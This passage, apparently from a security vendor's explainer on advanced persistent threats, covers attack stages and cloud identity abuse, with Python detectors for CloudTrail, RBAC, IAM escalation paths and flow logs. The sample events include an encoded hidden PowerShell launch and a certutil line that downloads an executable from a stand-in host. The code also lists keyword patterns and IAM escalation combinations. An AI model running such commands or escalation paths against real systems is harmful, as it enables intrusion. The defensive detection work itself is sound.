What is an advanced persistent threat?
An advanced persistent threat (APT) is a prolonged, targeted cyberattack where sophisticated threat actors infiltrate your network and maintain hidden access over extended periods—sometimes months or years—to steal sensitive data, conduct espionage, or position themselves for future disruption.
How APTs Differ from Other Cyber Threats
Understanding what makes APTs unique helps you prioritize defenses:
APT Campaigns
Operator model: Human-operated, adaptive
Objectives: Espionage, IP theft, strategic positioning
Dwell time: Weeks to months, sometimes years (varies by sophistication and by how quickly the target detects them)
Targeting: Specific organizations or sectors
Techniques: Custom tools, living off the land, zero-days (selective)
Ransomware Attacks
Operator model: Increasingly human-operated (big game hunting)
Objectives: Immediate financial gain through extortion
Dwell time: Days to weeks before encryption
Targeting: Opportunistic or sector-focused
Techniques: Commodity tools, encryption, data theft for double extortion
Commodity Malware
Operator model: Fully automated
Objectives: Mass credential theft, cryptomining, botnet recruitment
Dwell time: Hours to days before detection
Targeting: Indiscriminate, volume-based
Techniques: Known exploits, phishing at scale, automated propagation
The key distinction is that APTs invest significant time and resources to remain undetected while achieving specific strategic objectives, whereas ransomware and commodity malware prioritize speed and volume.
Why advanced persistent threats are particularly dangerous
Attackers use legitimate administrative tools already installed on your systems to carry out their activities, making their actions look like normal IT operations. This technique, called "living off the land," means their malicious activity blends in with everyday network traffic.
The attackers also adapt their tactics based on your defenses. If they notice you've blocked one method, they'll switch to another approach. This human-driven flexibility makes them far more dangerous than automated attacks that follow predictable patterns.
APTs selectively use zero-day vulnerabilities—security flaws unknown to vendors—when targeting high-value objectives. However, most APT intrusions exploit known vulnerabilities, valid credentials, and misconfigurations rather than zero-days. Organizations like Mandiant report that credential theft and exploitation of unpatched known vulnerabilities remain the most common initial access vectors, making basic security hygiene critical alongside advanced defenses. APTs also compromise trusted third-party vendors through supply chain attacks, such as the SolarWinds attack, giving them a backdoor into your network through partners you already trust.
The APT attack lifecycle and stages
APT attacks follow a predictable sequence of stages, though the timeline can stretch across months or years. Understanding these stages helps you spot the warning signs before attackers achieve their final goal.
Stage 1: Initial Compromise
The attack starts when attackers gain their first foothold in your network. They typically use spear-phishing emails that target specific employees with personalized messages designed to trick them into clicking malicious links or opening infected attachments. Other entry points include exploiting vulnerabilities in public-facing systems like web servers or VPNs, and simply logging in with credentials that were phished, leaked, or bought.
Stage 2: Establish a Foothold
Once inside, attackers immediately work to establish persistence. They install backdoors and remote access tools that let them return to your network even if you reboot systems or patch the original vulnerability. These tools communicate with the attacker's command and control servers using encrypted channels that look like normal internet traffic.
Stage 3: Privilege Escalation
Initial access usually gives attackers only basic user permissions. To move freely through your network, they need administrative privileges. They achieve this through privilege escalation: exploiting system vulnerabilities, cracking weak passwords, or stealing credentials from memory with credential-dumping tools that read the LSASS process on Windows.
Stage 4: Lateral Movement
With elevated privileges, attackers begin exploring your network to find valuable targets. They map out your systems using tools like BloodHound (for Active Directory environments) or native cloud APIs, identify critical servers, and locate sensitive data stores. This lateral movement through your network uses techniques like pass-the-hash, pass-the-ticket, or exploiting trust relationships between cloud accounts, letting them jump from one compromised system to another while expanding their control with each step.
Stage 5: Data Exfiltration
The final stage is achieving the objective, which usually means stealing your data. Attackers collect what they want, compress and encrypt it, stage it on an intermediate system, and then move it out in small chunks over time. Transferring gradually, and routing it through legitimate cloud storage services or encrypted channels, keeps each transfer below the thresholds that would flag a single large, suspicious upload and lets it blend with normal business traffic.
Common APT attack techniques and tactics
APT actors use a diverse toolkit of techniques that evolve constantly. While specific tools change, the underlying strategies remain consistent across different attack groups.
Social Engineering and Spear Phishing
Spear phishing is a highly targeted form of email attack. Unlike generic phishing that goes to thousands of people, spear phishing emails are crafted specifically for you or your colleagues. Attackers research your company on social media and public websites to make their emails look legitimate, often impersonating executives or trusted partners.
Zero-Day Exploitation
Zero-day vulnerabilities are security flaws that the software vendor doesn't know about yet, so no patch exists. APTs develop exploits for them when the target justifies the cost, which lets them get past even well-patched systems. Until the vendor ships a fix you cannot close the flaw itself; exploit mitigations, segmentation, least privilege, and behavioral detection are what limit how far the attacker gets in the meantime.
Supply Chain Attacks
Supply chain attacks target your trusted vendors and partners instead of attacking you directly. By compromising a software update from a vendor you trust, attackers can distribute malware to all of that vendor's customers at once. This approach bypasses your perimeter defenses because the malicious code comes from a source you've already approved.
Living Off the Land
To avoid detection, APTs use tools that are already installed on your systems for legitimate purposes: PowerShell, Windows Management Instrumentation (WMI), certutil, and, in the cloud, the provider's own CLI and APIs. Because these are legitimate utilities, blocking them outright is rarely an option. Detection has to rest on behavioral anomalies instead: PowerShell launched from an unusual parent process such as an Office application, WMI creating persistence mechanisms, or administrative tools running in user contexts that never run them.
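The parent-process and argument checks just described, as an added example (not code from the original article or from Wiz). It runs a simple rule over constructed process-creation events; the field names, the baseline of expected parent processes, and the suspicious-argument list are assumptions you would derive from your own telemetry:

```python
"""Detect living-off-the-land activity from process-creation telemetry.

Added example for this article; not code from the original page or from Wiz.
Events are constructed to resemble EDR/Sysmon process-creation records; the
field names and the baseline of expected parent processes are assumptions.
"""
from dataclasses import dataclass

# Which parents normally launch each administrative binary (assumed baseline;
# in practice this comes from weeks of your own process telemetry).
EXPECTED_PARENTS = {
    "powershell.exe": {"explorer.exe", "cmd.exe", "services.exe", "code.exe"},
    "wmic.exe": {"cmd.exe", "powershell.exe"},
    "certutil.exe": {"cmd.exe", "powershell.exe"},
}

# Document handlers, mail clients, browsers and web workers should essentially
# never spawn an admin tool: that is the spear-phishing or webshell pivot.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "outlook.exe", "msedge.exe", "chrome.exe", "w3wp.exe",
}

# Command-line fragments typical of download cradles and obfuscation.
SUSPICIOUS_ARGS = (
    "-enc", "-encodedcommand", "frombase64string", "downloadstring",
    "invoke-expression", "iex ", "-w hidden", "-urlcache",
)


@dataclass
class Finding:
    host: str
    image: str
    parent: str
    reason: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_lotl(events: list[dict]) -> list[Finding]:
    """One Finding per anomaly: unexpected parent and/or suspicious arguments."""
    findings = []
    for ev in events:
        image = basename(ev["image"])
        if image not in EXPECTED_PARENTS:
            continue  # not an admin tool this rule tracks
        parent = basename(ev["parent_image"])
        cmd = ev.get("command_line", "").lower()
        if parent in SUSPICIOUS_PARENTS:
            findings.append(Finding(ev["host"], image, parent,
                                    "admin tool spawned by a document, mail, browser or web process"))
        elif parent not in EXPECTED_PARENTS[image]:
            findings.append(Finding(ev["host"], image, parent, "unexpected parent process"))
        hits = [a for a in SUSPICIOUS_ARGS if a in cmd]
        if hits:
            findings.append(Finding(ev["host"], image, parent,
                                    "suspicious arguments: " + ", ".join(hits)))
    return findings


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS-017", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile Get-Service"},
    {"host": "WS-042", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"host": "SRV-DB01", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "wmic os get caption"},
    {"host": "WS-042", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": "certutil.exe -urlcache -split -f http://203.0.113.10/u.txt u.exe"},
    {"host": "WS-103", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell.exe -c Get-Date"},
]

if __name__ == "__main__":
    for f in detect_lotl(SAMPLE_EVENTS):
        print(f"{f.host}: {f.parent} -> {f.image}: {f.reason}")
```

A rule this simple is noisy where PowerShell is used heavily. The point is that the decision key is the (parent, child, arguments) triple rather than the binary itself, so tune the expected-parent baseline per host role instead of widening the suspicious lists.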
APT threats in cloud and containerized environments
Cloud environments create new opportunities for APT actors because of their complexity and the shared responsibility model between you and your cloud provider. The dynamic nature of cloud resources makes them harder to monitor and secure. Graph-based context across misconfigurations, identities, network exposure, and data helps surface the toxic combinations APTs exploit for lateral movement and persistence—such as an internet-exposed workload with an over-privileged role that can access sensitive data stores.
Cloud Control Plane Attacks
The cloud control plane includes the APIs and management interfaces you use to configure your cloud resources. If attackers compromise credentials with control plane access, they can create rogue resources, modify security controls (such as AWS security groups, Azure Network Security Groups, or GCP firewall rules), alter IAM policies to grant themselves additional permissions, or disable logging services (CloudTrail, Azure Activity Logs, GCP Cloud Audit Logs) to degrade visibility into their activities.
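A detector for exactly those control-plane actions, as an added example (not code from the original article or from Wiz). The records are constructed to follow the CloudTrail event schema; the admin allowlist and the severity scheme are assumptions:

```python
"""Flag control-plane tampering in CloudTrail records.

Added example for this article; not code from the original page or from Wiz.
Records are constructed to follow the CloudTrail event schema (eventName,
userIdentity, requestParameters, ...); the admin allowlist is an assumption.
"""
import json

# Principals expected to perform IAM and logging changes (assumed allowlist).
ADMIN_PRINCIPALS = {"arn:aws:iam::123456789012:user/secadmin"}

# API calls mapped to the tactic they most often serve during an intrusion.
WATCHED_EVENTS = {
    "StopLogging": ("defense evasion", "CloudTrail logging stopped"),
    "DeleteTrail": ("defense evasion", "CloudTrail trail deleted"),
    "UpdateTrail": ("defense evasion", "trail configuration changed"),
    "PutEventSelectors": ("defense evasion", "trail event selectors changed"),
    "CreateUser": ("persistence", "new IAM user"),
    "CreateAccessKey": ("persistence", "new long-lived access key"),
    "CreateLoginProfile": ("persistence", "console password set"),
    "UpdateAssumeRolePolicy": ("persistence", "role trust policy modified"),
    "AttachUserPolicy": ("privilege escalation", "managed policy attached to user"),
    "PutUserPolicy": ("privilege escalation", "inline policy added to user"),
    "AttachRolePolicy": ("privilege escalation", "managed policy attached to role"),
    "AuthorizeSecurityGroupIngress": ("network exposure", "security group ingress opened"),
}


def actor_of(record: dict) -> str:
    """Acting principal, unwrapping assumed-role sessions to the issuing role ARN."""
    ident = record.get("userIdentity", {})
    if ident.get("type") == "AssumedRole":
        return ident["sessionContext"]["sessionIssuer"]["arn"]
    return ident.get("arn", "unknown")


def _opens_to_internet(params: dict) -> bool:
    """True if any ipRanges/ipv6Ranges entry of the request is 0.0.0.0/0 or ::/0."""
    for perm in params.get("ipPermissions", {}).get("items", []):
        if any(r.get("cidrIp") == "0.0.0.0/0" for r in perm.get("ipRanges", {}).get("items", [])):
            return True
        if any(r.get("cidrIpv6") == "::/0" for r in perm.get("ipv6Ranges", {}).get("items", [])):
            return True
    return False


def analyze(records: list[dict]) -> list[dict]:
    """Return one finding per watched event, with severity and contextual notes."""
    findings = []
    for rec in records:
        name = rec.get("eventName")
        if name not in WATCHED_EVENTS:
            continue
        tactic, summary = WATCHED_EVENTS[name]
        actor = actor_of(rec)
        params = rec.get("requestParameters") or {}
        severity, notes = "medium", []
        if tactic == "defense evasion":
            severity = "critical"  # tampering with audit trails is never routine
        if actor not in ADMIN_PRINCIPALS and tactic in ("persistence", "privilege escalation"):
            severity = "high"
            notes.append("performed by non-admin principal")
        if name == "CreateAccessKey":
            target = params.get("userName")
            if target and not actor.endswith("user/" + target):
                severity = "high"
                notes.append(f"key created for another user ({target})")
        if name == "AuthorizeSecurityGroupIngress" and _opens_to_internet(params):
            severity = "high"
            notes.append("rule allows 0.0.0.0/0")
        if rec.get("errorCode"):
            notes.append("attempt failed: " + rec["errorCode"])  # failed attempts still matter
        findings.append({"eventName": name, "actor": actor, "sourceIP": rec.get("sourceIPAddress"),
                         "tactic": tactic, "severity": severity, "summary": summary, "notes": notes})
    return findings


# Constructed sample records (CloudTrail shape, hypothetical account and principals).
SAMPLE_RECORDS = json.loads('''{"Records": [
 {"eventName": "DescribeInstances", "eventSource": "ec2.amazonaws.com",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"},
  "sourceIPAddress": "198.51.100.23"},
 {"eventName": "CreateUser", "eventSource": "iam.amazonaws.com",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/deploy-bot"},
  "sourceIPAddress": "203.0.113.77", "requestParameters": {"userName": "svc-backup2"}},
 {"eventName": "StopLogging", "eventSource": "cloudtrail.amazonaws.com",
  "userIdentity": {"type": "AssumedRole",
   "arn": "arn:aws:sts::123456789012:assumed-role/DevRole/i-0abc123",
   "sessionContext": {"sessionIssuer": {"arn": "arn:aws:iam::123456789012:role/DevRole"}}},
  "sourceIPAddress": "203.0.113.77", "requestParameters": {"name": "org-trail"}},
 {"eventName": "AuthorizeSecurityGroupIngress", "eventSource": "ec2.amazonaws.com",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/alice"},
  "sourceIPAddress": "198.51.100.23",
  "requestParameters": {"groupId": "sg-0123", "ipPermissions": {"items": [
     {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
      "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
 {"eventName": "CreateAccessKey", "eventSource": "iam.amazonaws.com",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/secadmin"},
  "sourceIPAddress": "198.51.100.9", "requestParameters": {"userName": "bob"}},
 {"eventName": "AttachUserPolicy", "eventSource": "iam.amazonaws.com",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/secadmin"},
  "sourceIPAddress": "198.51.100.9",
  "requestParameters": {"userName": "alice", "policyArn": "arn:aws:iam::aws:policy/ReadOnlyAccess"}}
]}''')["Records"]

if __name__ == "__main__":
    for f in analyze(SAMPLE_RECORDS):
        print(f["severity"].upper(), f["eventName"], f["actor"], f["notes"])
```

Assumed-role sessions are resolved back to the issuing role so that DevRole shows up as the actor regardless of the session name. The CreateAccessKey check flags keys minted for a user other than the caller, which is how an intruder with one identity turns it into a second, quieter one.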
Container and Kubernetes Exploitation
Containers and Kubernetes introduce unique risks that APTs exploit. Attackers target vulnerable container images, misconfigured Kubernetes RBAC (Role-Based Access Control), overly permissive network policies, and exposed Kubernetes API servers. Compromising the Kubernetes API server or etcd (the cluster's configuration database) can grant broad cluster control, while container escape techniques allow attackers to break out of container isolation to access the underlying host system.
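An RBAC audit that looks for the misconfigurations mentioned above, as an added example (not code from the original article or from Wiz). Its input is shaped like the JSON that `kubectl get clusterroles,clusterrolebindings -o json` returns; the objects below are constructed, not exported from a real cluster, and the list of sensitive resources and verbs is a starting point rather than a complete catalogue:

```python
"""Audit Kubernetes RBAC for grants that hand an intruder cluster control.

Added example for this article; not code from the original page or from Wiz.
Input is shaped like `kubectl get clusterroles,clusterrolebindings -o json`
(a v1 List); the objects below are constructed, not exported from a cluster.
"""

# (apiGroup, resource) -> verbs that amount to node or cluster compromise
SENSITIVE_RULES = {
    ("", "secrets"): {"get", "list", "watch", "*"},
    ("", "pods/exec"): {"create", "*"},
    ("", "pods"): {"create", "*"},  # creating pods lets you mount any SA token or hostPath
    ("rbac.authorization.k8s.io", "clusterrolebindings"): {"create", "*"},
    ("rbac.authorization.k8s.io", "clusterroles"): {"bind", "escalate", "*"},
}
ESCALATION_VERBS = {"impersonate", "bind", "escalate"}
BROAD_GROUPS = {"system:authenticated", "system:unauthenticated", "system:serviceaccounts"}
ADMIN_ROLES = {"cluster-admin"}


def audit_roles(roles):
    """Return {role name: [reasons]} for ClusterRoles with dangerous grants."""
    risky = {}
    for role in roles:
        reasons = []
        for rule in role.get("rules", []):
            groups, resources = rule.get("apiGroups", []), rule.get("resources", [])
            verbs = set(rule.get("verbs", []))
            if "*" in groups and "*" in resources and "*" in verbs:
                reasons.append("wildcard rule (*/*/*) is equivalent to cluster-admin")
                continue
            if verbs & ESCALATION_VERBS:
                reasons.append("verbs " + ",".join(sorted(verbs & ESCALATION_VERBS)) + " allow escalation")
            for group in groups:
                for resource in resources:
                    dangerous = SENSITIVE_RULES.get((group, resource))
                    if dangerous and verbs & dangerous:
                        reasons.append(f"{resource}: {','.join(sorted(verbs & dangerous))}")
        if reasons:
            risky[role["metadata"]["name"]] = reasons
    return risky


def audit_bindings(bindings, risky_roles):
    """Flag ClusterRoleBindings that give risky roles to broad groups or default service accounts."""
    findings = []
    for binding in bindings:
        role = binding["roleRef"]["name"]
        role_is_risky = role in ADMIN_ROLES or role in risky_roles
        for subject in binding.get("subjects", []):
            kind, name = subject["kind"], subject["name"]
            reasons = []
            if kind == "Group" and name in BROAD_GROUPS:
                reasons.append(f"bound to broad group {name}")
            if kind == "ServiceAccount" and name == "default":
                reasons.append(f"bound to default service account in namespace {subject.get('namespace')}")
            if kind == "ServiceAccount" and role in ADMIN_ROLES:
                reasons.append("cluster-admin granted to a service account")
            # Anonymous access is reportable whatever the role; otherwise only risky roles matter.
            if reasons and (role_is_risky or name == "system:unauthenticated"):
                findings.append({"binding": binding["metadata"]["name"], "role": role,
                                 "subject": f"{kind}/{name}", "reasons": reasons})
    return findings


def audit(kube_list):
    """Split a v1 List into roles and bindings and run both audits."""
    items = kube_list["items"]
    risky = audit_roles([i for i in items if i["kind"] == "ClusterRole"])
    return risky, audit_bindings([i for i in items if i["kind"] == "ClusterRoleBinding"], risky)


# Constructed sample cluster state (not from a real cluster).
SAMPLE = {"kind": "List", "apiVersion": "v1", "items": [
    {"kind": "ClusterRole", "metadata": {"name": "ci-deployer"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "secret-reader"},
     "rules": [{"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "pod-viewer"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "ci-deployer-binding"},
     "roleRef": {"kind": "ClusterRole", "name": "ci-deployer"},
     "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "ci"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "anon-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:unauthenticated"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "secret-readers"},
     "roleRef": {"kind": "ClusterRole", "name": "secret-reader"},
     "subjects": [{"kind": "User", "name": "backup-operator"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "viewers"},
     "roleRef": {"kind": "ClusterRole", "name": "pod-viewer"},
     "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
]}

if __name__ == "__main__":
    risky, findings = audit(SAMPLE)
    for name, reasons in risky.items():
        print("risky role", name, reasons)
    for f in findings:
        print("risky binding", f["binding"], f["subject"], f["reasons"])
```

The binding audit deliberately ignores broad groups bound to harmless roles (the viewers binding above) so the output stays actionable; namespaced Roles and RoleBindings need the same treatment, with the extra wrinkle that a RoleBinding may reference a ClusterRole and so inherit its risk inside that namespace.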
Serverless and Function Manipulation
Serverless computing abstracts away infrastructure management, but it doesn't eliminate security risks. An attacker who can change a function's code or configuration, through a compromised deployment credential or an over-permissive update permission, runs their own code under the function's execution role and can steal data or trigger actions across your cloud services. Because functions are wired together by events, one compromised function can invoke others, so a chain of over-privileged execution roles becomes a path through your environment.
Identity and Access Management Abuse
In cloud environments, identity becomes your primary security boundary. APTs exploit cloud identity systems through multiple techniques:
Token and Credential Theft
Stealing OAuth access tokens or refresh tokens from compromised applications
Harvesting credentials from instance metadata services (AWS EC2 IMDS, Azure IMDS), classically through a server-side request forgery against a workload that still allows the unauthenticated IMDSv1 endpoint on AWS
Extracting service principal credentials from application configuration files or environment variables
Permission Abuse
Exploiting over-privileged roles with excessive permissions beyond job requirements
Leveraging unused permissions that remain attached to identities
Abusing complex trust relationships between accounts (AWS cross-account roles, Azure service principals)
Identity System Manipulation
OAuth application consent abuse to gain persistent access to user data
Creating backdoor identities or service principals for persistent access
Modifying federation configurations to establish alternative authentication paths
Exploiting OIDC (OpenID Connect) misconfigurations in CI/CD pipelines
Privilege Escalation
Chaining permissions to escalate from low-privilege to administrative access
Exploiting IAM policy misconfigurations that grant unintended permissions
Abusing assume-role or impersonation capabilities to access higher-privilege contexts
Unified CIEM (Cloud Infrastructure Entitlement Management) analysis identifies over-privileged roles, unused permissions, and risky trust relationships before attackers exploit them.
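A small path finder for the permission chaining described in the Privilege Escalation list above, as an added example (not code from the original article or from Wiz). It treats sts:AssumeRole plus a matching trust policy as an edge, walks the graph from a starting identity, and reports any reachable identity that holds a well-documented escalation primitive. The principals, policies, and trust relationships are constructed, and the model is deliberately simplified: it ignores Deny statements, resource ARNs, conditions, permission boundaries, and SCPs, all of which a real evaluation must honour:

```python
"""Find privilege-escalation paths through IAM permissions and role trusts.

Added example for this article; not code from the original page or from Wiz.
Principals, policies and trust relationships are constructed. This is a
simplified model: real evaluation must also honour Deny statements, resource
ARNs, conditions, permission boundaries and SCPs, which are ignored here.
"""
from collections import deque
from fnmatch import fnmatchcase

# Well-documented permission sets that are sufficient to reach administrative
# access on their own (illustrative, not exhaustive).
ESCALATION_COMBOS = [
    ("CreatePolicyVersion on own policy", ["iam:CreatePolicyVersion"]),
    ("SetDefaultPolicyVersion", ["iam:SetDefaultPolicyVersion"]),
    ("AttachUserPolicy", ["iam:AttachUserPolicy"]),
    ("AttachRolePolicy", ["iam:AttachRolePolicy"]),
    ("PutUserPolicy", ["iam:PutUserPolicy"]),
    ("CreateAccessKey for another user", ["iam:CreateAccessKey"]),
    ("UpdateAssumeRolePolicy + AssumeRole", ["iam:UpdateAssumeRolePolicy", "sts:AssumeRole"]),
    ("PassRole + Lambda create/invoke",
     ["iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"]),
    ("PassRole + EC2 RunInstances", ["iam:PassRole", "ec2:RunInstances"]),
    ("UpdateFunctionCode on a privileged function", ["lambda:UpdateFunctionCode"]),
]


def allows(granted: list[str], action: str) -> bool:
    """IAM-style, case-insensitive wildcard match: 'iam:*', 'ec2:Describe*', '*'."""
    return any(fnmatchcase(action.lower(), pattern.lower()) for pattern in granted)


def direct_escalations(granted: list[str]) -> list[str]:
    """Names of escalation combos fully covered by the granted actions."""
    return [name for name, needed in ESCALATION_COMBOS if all(allows(granted, a) for a in needed)]


def find_escalation_paths(start: str, principals: dict, roles: dict, max_hops: int = 4):
    """Breadth-first search over sts:AssumeRole edges from `start`.

    Returns [(path, [escalation names])] for every reachable identity that
    holds an escalation primitive; `path` lists the identities assumed in order.
    """
    entities = {**principals, **roles}
    results, seen, queue = [], {start}, deque([[start]])
    while queue:
        path = queue.popleft()
        granted = entities[path[-1]]["actions"]
        escalations = direct_escalations(granted)
        if escalations:
            results.append((path, escalations))
        # An identity can only hop if it holds sts:AssumeRole and the target trusts it.
        if len(path) > max_hops or not allows(granted, "sts:AssumeRole"):
            continue
        for role_name, role in roles.items():
            if role_name not in seen and (path[-1] in role["trusted"] or "*" in role["trusted"]):
                seen.add(role_name)
                queue.append(path + [role_name])
    return results


# Constructed inventory (hypothetical account; not real identities).
PRINCIPALS = {
    "user/dev-alice": {"actions": ["s3:GetObject", "sts:AssumeRole", "lambda:ListFunctions"]},
    "user/bob-readonly": {"actions": ["ec2:Describe*", "s3:ListBucket"]},
    "user/secops": {"actions": ["sts:AssumeRole", "iam:Get*", "iam:List*"]},
}
ROLES = {
    "role/ci-builder": {"actions": ["iam:PassRole", "lambda:CreateFunction",
                                    "lambda:InvokeFunction", "logs:*"],
                        "trusted": ["user/dev-alice", "role/ci-runner"]},
    "role/ci-runner": {"actions": ["sts:AssumeRole", "codebuild:*"],
                       "trusted": ["service/codebuild.amazonaws.com"]},
    "role/admin": {"actions": ["*"], "trusted": ["user/secops"]},
}

if __name__ == "__main__":
    for who in PRINCIPALS:
        for path, escalations in find_escalation_paths(who, PRINCIPALS, ROLES):
            print(" -> ".join(path), ":", "; ".join(escalations))
```

Run against the sample, dev-alice has no dangerous permission herself but can assume ci-builder, which holds the PassRole plus Lambda combination, so her account is one hop from administrative access. The secops path to role/admin is found too: the search reports reachability, not intent, and reviewing whether each path is meant to exist is the human part of the job.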
Detecting advanced persistent threats
Detecting APTs requires moving beyond traditional signature-based security to focus on behavior and anomalies. Since these attackers blend in with normal activity, you need to identify subtle deviations from expected patterns.
Behavioral Analytics
Behavioral analytics establishes a baseline of normal activity for your users, devices, and network traffic. Your security systems then watch for deviations from this baseline, such as users accessing systems they've never touched before or data transfers happening at unusual times. Agentless, unified telemetry across control plane, workloads, and identities enables reliable baselining and anomaly detection without deployment friction, ensuring complete visibility from day one rather than waiting weeks for agent rollout and baseline establishment.
Network Traffic Analysis
While APTs try to hide their command and control communications, careful analysis of network traffic can reveal their presence. Look for unusual internal traffic patterns that might indicate lateral movement, or identify data being collected on staging servers before exfiltration. Monitoring east-west traffic between internal systems is as important as north-south traffic to the internet. In cloud environments, this includes analyzing VPC Flow Logs (AWS), NSG Flow Logs (Azure), and VPC Flow Logs (GCP) to detect unusual inter-service communications, unexpected cross-account access, or data movement patterns that indicate lateral movement between compromised resources.
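The two flow-log checks described above, gradual exfiltration (the small-chunk pattern from Stage 5) and new east-west pairs, as an added example (not code from the original article or from Wiz). The records are constructed in the AWS VPC Flow Logs default version-2 format; the baseline of known internal pairs and every threshold are assumptions to be tuned per environment:

```python
"""Spot gradual exfiltration and unexpected east-west traffic in VPC Flow Logs.

Added example for this article; not code from the original page or from Wiz.
The records are constructed in the AWS VPC Flow Logs default (version 2)
format; the baseline of known internal pairs and all thresholds are assumptions.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

FIELDS = ("version account_id interface_id srcaddr dstaddr srcport dstport "
          "protocol packets bytes start end action log_status").split()

# RFC 1918 only. ipaddress.is_private would also classify the documentation
# ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) used below as private.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
KNOWN_INTERNAL_PAIRS = {("10.0.1.10", "10.0.2.20")}   # assumed baseline of normal east-west pairs
ADMIN_PORTS = {22, 445, 3389, 5985, 5986}
SMALL_FLOW_BYTES = 512 * 1024        # a "small chunk" stays below per-flow volume alerts
MIN_CHUNKS = 10                       # how many chunks to one destination before we care
MIN_TOTAL_BYTES = 2 * 1024 * 1024    # aggregate that a single transfer would have tripped


def is_internal(addr: str) -> bool:
    a = ip_address(addr)
    return any(a in net for net in INTERNAL_NETS)


def parse(lines):
    """Yield dicts for well-formed version-2 records; skip headers and NODATA/SKIPDATA rows."""
    for line in lines:
        parts = line.split()
        if len(parts) != len(FIELDS) or parts[0] != "2" or parts[-1] != "OK":
            continue
        rec = dict(zip(FIELDS, parts))
        for key in ("srcport", "dstport", "protocol", "packets", "bytes", "start", "end"):
            rec[key] = int(rec[key])
        yield rec


def analyze(lines, known_pairs=KNOWN_INTERNAL_PAIRS):
    findings = []
    outbound = defaultdict(list)     # (src, dst, dstport) -> [bytes per flow]
    new_pairs = defaultdict(int)     # (src, dst, dstport) -> accepted flow count
    for rec in parse(lines):
        if rec["action"] != "ACCEPT":
            continue  # REJECTs deserve a separate scan-detection rule
        src, dst, port = rec["srcaddr"], rec["dstaddr"], rec["dstport"]
        if is_internal(src) and not is_internal(dst):
            outbound[(src, dst, port)].append(rec["bytes"])
        elif is_internal(src) and is_internal(dst) and (src, dst) not in known_pairs:
            new_pairs[(src, dst, port)] += 1
    for (src, dst, port), sizes in outbound.items():
        small = [b for b in sizes if b <= SMALL_FLOW_BYTES]
        if len(small) >= MIN_CHUNKS and sum(small) >= MIN_TOTAL_BYTES:
            findings.append({"type": "gradual_exfiltration", "src": src, "dst": dst,
                             "dstport": port, "chunks": len(small), "total_bytes": sum(small)})
    for (src, dst, port), n in new_pairs.items():
        findings.append({"type": "new_east_west_pair", "src": src, "dst": dst,
                         "dstport": port, "flows": n, "admin_port": port in ADMIN_PORTS})
    return findings


def _flow(src, dst, dport, nbytes, start, action="ACCEPT"):
    """Build one constructed default-format record (version 2, 14 fields)."""
    return (f"2 123456789012 eni-0a1b2c3d4e5f6a7b8 {src} {dst} 49152 {dport} 6 40 "
            f"{nbytes} {start} {start + 60} {action} OK")


T0 = 1_700_000_000
SAMPLE_LINES = (
    # twelve 300 KB uploads to one external host, ten minutes apart
    [_flow("10.0.1.10", "203.0.113.50", 443, 300_000, T0 + i * 600) for i in range(12)]
    + [_flow("10.0.1.10", "198.51.100.7", 443, 1_200, T0),
       _flow("10.0.1.10", "198.51.100.7", 443, 1_200, T0 + 60)]          # ordinary API chatter
    + [_flow("10.0.1.10", "203.0.113.80", 443, 50_000_000, T0)]          # one big upload: volume-alert territory
    + [_flow("10.0.1.10", "10.0.2.20", 5432, 8_000, T0)]                 # known app -> db pair
    + [_flow("10.0.3.5", "10.0.2.20", 445, 4_096, T0),
       _flow("10.0.3.5", "10.0.2.20", 445, 4_096, T0 + 5)]               # new pair on SMB
    + [_flow("10.0.3.5", "10.0.2.21", 3389, 0, T0, action="REJECT")]     # blocked RDP probe
    + [_flow("10.0.3.5", "10.0.2.30", 8080, 2_048, T0)]                  # new pair, non-admin port
)

if __name__ == "__main__":
    for f in analyze(SAMPLE_LINES):
        print(f)
```

The single 50 MB upload is intentionally not reported here: that is what a volume threshold already catches, while the twelve 300 KB transfers, each individually unremarkable, are the pattern the threshold misses. In practice the outbound aggregation runs over a sliding window of hours to days and is joined with DNS or threat-intelligence context on the destination.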
User and Entity Behavior Analytics
